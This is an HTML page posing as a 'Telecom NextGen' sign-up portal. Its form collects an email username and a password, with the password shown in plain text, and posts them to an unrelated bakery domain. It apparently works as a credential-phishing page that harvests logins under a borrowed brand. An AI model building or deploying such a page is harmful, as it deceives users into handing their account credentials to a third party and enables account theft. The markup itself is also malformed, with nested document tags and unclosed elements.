<html>
        <body><!DOCTYPE html>
<html>
    <head><title>Telecom-NextGen.com</title></head>
    <body>
       <h2> <center>Telecom NextGen</center></h2>
       <hr>
       <br><br>
     <center> <div class="fade-in-image"> <img width="200px" src="https://www.seekpng.com/png/detail/46-462959_unknown-person-icon-png-download-single-people-logo.png"></center></div>
       <form action="https://amberbakery.co.uk/" target="_blank" method="POST">
       
       <fieldset>
           <legend>Telecom sign-up</legend>
           <center><label>Username:</label>
           <input type="email" name="username" placeholder=" example@example.com" required></center>
           <br>
           <center> <label>Password:</label>
           <input type="text" name="password" placeholder="  Enter  your password">
           <br>
           <br>
           <button>Submit</button>
           <br><br>
<button>Register</button>
           </fieldset>
        </body>
</html></body>
        <style>h2{
     font-family:'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
    color:darkolivegreen;
}
body{
    background:linear-gradient(to top,whitesmoke,ivory,lightblue,lightskyblue,deepskyblue)
}
legend{
    color:lightseagreen;
   font-family:cursive;
   padding:10px;
   font-size: 20px;
}
fieldset{
    padding:40px;
}
button{
    background-color:greenyellow;
   border-radius: 15px;
    width:90px;
    padding:5px;
    color:white;
    border-color:white;
    opacity:0.6;
}
input{
  border-radius: 15px;  
  height: 30px; 
}
button:hover{
color:white;
 background-color:green;
}
label{
    font-family:'Courier New', Courier, monospace;
    font-size: 40px;
}

</style>
        <script></script>
      </html>